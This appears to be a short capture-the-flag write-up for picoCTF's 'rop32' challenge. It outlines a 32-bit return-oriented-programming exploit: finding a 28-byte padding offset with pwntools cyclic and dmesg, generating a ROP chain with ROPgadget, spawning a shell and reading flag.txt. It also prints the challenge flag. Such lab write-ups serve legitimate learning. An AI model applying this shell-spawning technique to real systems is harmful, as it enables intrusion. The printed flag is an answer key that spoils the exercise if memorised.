rop32
Last updated
Was this helpful?
Last updated
Was this helpful?
Can you exploit the following program to get a flag? You can find the program in /problems/rop32_4_0636b42072627d283f46d2427804b10c on the shell server. Source.
Get padding by running python2 -c "from pwn import *; print cyclic(50)" | ./vuln
then dmesg | tail
to get segfault address of 0x61616168
then cyclic_find(0x61616168)
to get padding of 'a'*28
Run python ROPgadget.py --binary ./vuln --rop --badbytes "0a"
to get ROP chain
Paste in padding of 'a'*28
Run for remote execution
Run cat flag.txt
in the shell that spawns
picoCTF{rOp_t0_b1n_sH_dee2e288}